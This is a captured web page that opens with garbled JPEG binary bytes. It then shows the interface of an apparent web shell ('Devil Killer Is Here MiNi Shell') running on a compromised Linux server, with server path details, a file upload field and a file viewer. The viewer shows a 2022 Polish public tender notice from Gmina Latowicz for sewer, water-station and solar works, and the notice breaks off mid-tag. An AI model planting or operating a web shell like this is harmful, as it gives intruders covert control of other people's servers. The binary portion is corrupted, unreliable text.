JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220606/0019583901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wsparcie infrastruktury wodno-kanalizacyjnej na terenie gminy Latowicz </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Latowicz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582730</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Latowicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-334</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gmina-latowicz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">latowicz.samorzady.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wsparcie infrastruktury wodno-kanalizacyjnej na terenie gminy Latowicz </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1e2d37f5-e58a-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00195839</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024407/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Wsparcie infrastruktury wodno-kanalizacyjnej na terenie gminy Latowicz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">bip.gmina-latowicz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza<br/>dokomunikacji”.<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisanezostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznejplatformy usług administracji publicznej (ePUAP).<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularzzłożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7) Zamawiający przekazuje link do postępowania oraz ID postępowania z miniPortalu jako załącznik do niniejszej SWZ/OPiWZ.<br/>Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładkiPostępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Gmina Latowicz reprezentowana<br/>przez Wójta Gminy Latowicz, ul. Rynek 6, 05-334 Latowicz, telefon: 25 752 10 65.<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem<br/>e-mail: inspektor@cbi24.pl<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo<br/>zamówień publicznych (Dz. U. z 2019 r. poz. 2019), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania<br/>umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z PZP.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust.1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/>Administrator nie udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 Rozporządzenia.<br/>15. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>Rozporządzenia, nie może naruszać integralności protokołu oraz jego załączników.<br/>16. Ponadto informujemy, iż w związku z przetwarzaniem Pani/Pana danych osobowych nie podlega Pan/Pani decyzjom, które się<br/>opierają wyłącznie na zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Rozporządzenia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGOŚ.271.9A.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa kanalizacji sanitarnej do w Wężyczynie wraz z kanałem łączącym z miejscowością Latowicz o długości ok . 5 565 m. Zadanie będzie realizowane w trybie &#34;zaprojektuj i wybuduj&#34;. Zadaniem wykonawcy będzie, uzyskanie wszystkich wymaganych uzgodnień, pozwoleń, decyzji, opinii itp. wynikających z przepisów obowiązującego prawa, w tym uzyskanie ostatecznego pozwolenie na budowę. Zamawiający przekaże wykonawcy do dalszych prac: <br/>1) wstępnie uzgodniony z właścicielami nieruchomości przebieg sieci kanalizacyjnej ,<br/>2) mapy do celów projektowych na cały przebieg kanalizacji, <br/>3) ostateczną decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, <br/>4) program funkcjonalno-użytkowy<br/><br/>Wykonawca zobowiązany jest dokonać uzgodnień z zamawiającym na etapie koncepcyjnym wykonania dokumentacji projektowej<br/>Wykonawca wykona projekt budowlany (5 egz) i wykonawczy (5egz) na cały zakres kanalizacji przedstawiony na załączonych mapach i uzgodniony z właścicielami działek. Wykonawca wykona pozostałe opracowania projektowe tj . specyfikację techniczną wykonania i odbioru robót budowlanych (5 egz) oraz szczegółowe przedmiary robót ( 2egz) i kosztorys inwestorski (2egz). Wszystkie opracowania również w wersji elektronicznej na płycie CD. <br/>Po opracowaniu dokumentacji projektowej, przed złożeniem jej w organie administracji architektoniczno-budowlanej wraz z wnioskiem o pozwolenie na budowę, wykonawca przedłoży całość dokumentacji zamawiającemu w wersji papierowej lub elektronicznej i uzyska akceptację zamawiającego w kwestii zgodności z wymaganiami zawartymi w programie funkcjonalno-użytkowym i swz. Dopiero po uzyskaniu akceptacji zamawiającego wykonawca jest uprawniony do wystąpienia z wnioskiem o pozwolenie na budowę. Wykonawca w terminach wyznaczonych przez organ administracji dokona poprawy, uzupełnień złożonej dokumentacji. Na podstawie opracowanej i zatwierdzonej przez zamawiającego dokumentacji wykonawca wystąpi do Starosty Mińskiego organu administracji architektoniczno-budowlanej i uzyska ostateczne pozwolenie na budowę. Zamawiający udzieli pełnomocnictwa projektantowi działającemu w imieniu wykonawcy.<br/>Zamawiający wyznacza termin pośredni (kamień milowy kontraktu) - opracowanie dokumentacji projektowej , wystąpienie z wnioskiem o pozwolenie na budowę i uzyskanie ostatecznego pozwolenia na budowę w najpóźniej w terminie do 30.10.2022r.<br/>Po uzyskaniu ostatecznego pozwolenia na budowę wykonawca ustanowi kierownika budowy oraz dopełni innych warunków formalnych wynikających z treści pozwolenie na budowę i przystąpi do wykonywania robót budowlanych przy budowie kanalizacji. Przed rozpoczęciem robót wykonawca zawiadomi nadzór budowlany o zamierzonym terminie rozpoczęcia robót.<br/>Roboty budowlane będą wykonywane zgodnie z dostarczonym przez zamawiającego programem funkcjonalno-użytkowym, zatwierdzoną przy pozwoleniu na budowę dokumentacją projektową oraz projektem wykonawczym.<br/>Uwaga!<br/>Zakres kanalizacji do wybudowania został zaznaczony opisany na załączonych mapach różowa przerywaną obwolutą i wstępnie obejmuje budowę ok. 5 645 m sieci głównej wraz z przepompowniami ,w tym:<br/>1)Sieć grawitacyjna DN 200 L=2370m <br/>2) Sieć tłoczna DN90-160 L=3275m <br/>3)Sieć kanalizacji sanitarnej (kanały boczne) Ø160mm PVC o długości ok. L=250,0m <br/>4)Przepompownie kpl. 2 <br/>5)Studnie na przewodach tłocznych rewizyjne z zaworami napowietrzająco odpowietrzającymi 5 kpl. <br/>6)Odtworzenie nawierzchni po robotach 1 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia w zakresie Modernizacji SUW Chyżyny został szczegółowo opisany w załączonej dokumentacji projektowej w tym projekcie wykonawczym Modernizacji SUW Chyżyny, załączonych przedmiarach robót i dokumentach STWiORB. Dokumenty te łącznie opisują przedmiot zamówienia, tzn. wykonawca zobowiązany jest wykonać roboty budowlane wyszególnione chociażby w jednym z tych dokumentów. W przypadku niespójności w rodzaju lub ilości robót do wykonania wyszególnionych w tych dokumentach, nadrzędne znaczenie ma w kolejności: 1) projekt techniczny 2) projekt budowlany 3) SWZ 4) STWIORB, 5) przedmiary robót (materiał pomocniczy) -z za wyjątkiem prac oznaczonych *, które wykazane w projekcie technicznym należy w trakcie wykonania uzgodnić w inspektorem nadzoru.<br/>Uwaga<br/>Zakres zamówienia obejmuje część robót wymienionych z załączonym projekcie budowalnym. <br/>Zakres zamówienia obejmuje następujące roboty budowalno-montażowe:<br/>1. Demontaż istniejącego fundamentu pod zestawem hydroforowym na hali filtrów<br/>2. Demontaż zestawu hydroforowego <br/>3. Rozbiórka ścianki działowej w pomieszczeniu rozdzielni elektrycznej<br/>4. Malowanie, układanie terakoty w pomieszczeniu rozdzielni elektrycznej<br/>5. Wykonanie nowego fundamentu pod zestaw hydroforowy <br/>6. Montaż nowego zestawu hydroforowego z pompami płucznymi<br/>7. Montaż mieszacza statycznego DN150mm L=1,0m przed istniejącym aeratorem<br/>8. Wymiana rurociągów wody surowej i wykonanie „obejścia” aeratora z rur ze stali nierdzewnej *<br/>9. Wymiana rurociągów doprowadzających powietrzne, (zmiana średnicy z DN65 na DN80mm stal nierdzewna) *<br/>10. Zmiana lokalizacji istniejącego aeratora z filtrem nr 2A *<br/>11. Doposażenie istniejącej technologii stacji w przepustnice, przepływomierze, mętnościomierze<br/>12. Montaż sondy tlenowej na rurociągu wody uzdatnionej – kpl. 1<br/>13. Montaż dmuchaw na hali filtrów – kpl. 2 <br/>14. Montaż sprężarek bezolejowych na hali filtrów – kpl. 2<br/>15. Wykonanie nowego sterowania, zasilenia elektrycznego i nowej automatyki sterującej technologią SUW<br/>16. Budowa zbiornika żelbetowego na wodę uzdatnioną V=200m3 wraz z instalacjami zasilającymi, poboru i spustu wody<br/>17. Montaż sond hydrostatycznych w zbiornikach wody uzdatnionej – kpl. 2<br/>18. Montaż przewodów elektrycznych zasilających istniejącą studnie głębinową <br/>19. Montaż dwóch słupów oświetleniowych<br/>20. Montaż zewnętrznych sieci technologicznych<br/>21. Montaż zbiorników betonowych DN2500 na wody popłuczne z płukania filtrów z podłączeniem do istniejącej kanalizacji wód popłucznych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45252126-7 - Roboty budowlane w zakresie zakładów uzdatniania wody pitnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości na od daty bezusterkowego protokolarnego odbioru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa instalacji fotowoltaicznej a) przy Gminnej Oczyszczalni Ścieków Komunalnych w Latowiczu i b) Stacji Uzdatniania<br/>Wody w Chyżynach.<br/>Przedmiotem zamówienie jest budowa instalacji fotowoltaicznej o mocy 40 kWp przy Gminnej Oczyszczalni Ścieków<br/>Komunalnych w Latowiczu przy ul. Mostowej oraz budowa instalacji o mocy 20 kWp przy Stacji Uzdatniania Wody w<br/>Chyżynach.<br/>systemie „Zaprojektuj i wybuduj.<br/>Zadanie będzie realizowane w trybie &#34;zaprojektuj i wybuduj&#34;. Zadaniem wykonawcy będzie, uzyskanie wszystkich<br/>wymaganych uzgodnień, pozwoleń, decyzji, opinii itp. wynikających z przepisów obowiązującego prawa, Zamawiający przekaże wykonawcy do dalszych prac:- ) program funkcjonalno-użytkowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 